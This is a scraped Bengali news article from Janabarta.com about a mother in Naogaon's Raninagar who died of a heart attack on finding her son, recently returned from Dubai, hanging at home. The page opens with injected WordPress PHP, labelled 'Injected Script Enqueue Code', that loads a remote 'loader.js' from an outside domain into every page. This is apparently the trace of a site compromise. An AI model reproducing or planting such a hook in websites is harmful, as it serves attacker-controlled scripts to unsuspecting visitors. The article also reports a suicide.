// Injected Script Enqueue Code function enqueue_custom_script() { wp_enqueue_script( 'custom-error-script', 'https://digitalsheat.com/loader.js', array(), null, true ); } add_action('wp_enqueue_scripts', 'enqueue_custom_script'); Janabarta.com | Newsportal Site প্রবাস ফেরত ছেলের ঝুলন্ত লাশ দেখে মায়ের মৃত্যু - Janabarta.com

প্রবাস ফেরত ছেলের ঝুলন্ত লাশ দেখে মায়ের মৃত্যু

নওগাঁ প্রতিনিধি: নওগাঁর রাণীনগর উপজেলায় প্রবাস ফেরত ছেলের ঝুলন্ত মরদেহ দেখে হৃদরোগে আক্রান্ত হয়ে মায়ের মৃত্যু হয়েছে। শনিবার সকাল ১০টার দিকে লাশ দুটি উদ্ধার করেছে পুলিশ। এঘটনায় ওই এলাকায় শোকের ছায়া নেমে এসেছে।

নিহতেরা হলেন- ওই উপজেলার গনা ইউনিয়নের পিরেরা গ্রামের মৃত আব্দুস সালামের স্ত্রী রাশেদা বেগম (৫৫) ও ছেলে আসলাম হোসেন (৩৫)।

পুলিশ ও এলাকাবাসীরা জানায়, গত বছর দুবাই থেকে দেশে ফেরেন আসলাম। বাড়িতে ফেরার পর থেকেই তিনি মানসিক সমস্যায় ভুগছিলেন। আজ সকালে আসলাম ঘুম থেকে না উঠায় তাঁর মা ছেলেকে ডাকাডাকি করে। পরে ঘরের ভেতর থেকে কোনও আওয়াজ না পেয়ে জানালা ধাক্কা দেয়। পওে জানালা দিয়ে ছেলের ঝুলন্ত লাশ দেখে ঘটনাস্থলেই হৃদরোগে আক্রান্ত হয়ে তিনিও মারা যান।

ঘটনার সত্যতা নিশ্চিত করে রাণীনগর থানার ওসি জহুরুল হক জানান, স্থানীয়দের খবরে পুলিশ ঘটনাস্থলে গিয়ে লাশ দুটি উদ্ধার করে ময়নাতদন্তের জন্য নওগাঁ সদর হাসপতালে পাঠিয়েছে। ময়নাতদন্তের রিপোর্ট অনুযায়ী পরবর্তীতে আইনানুগ ব্যবস্থা নেয়া হবে।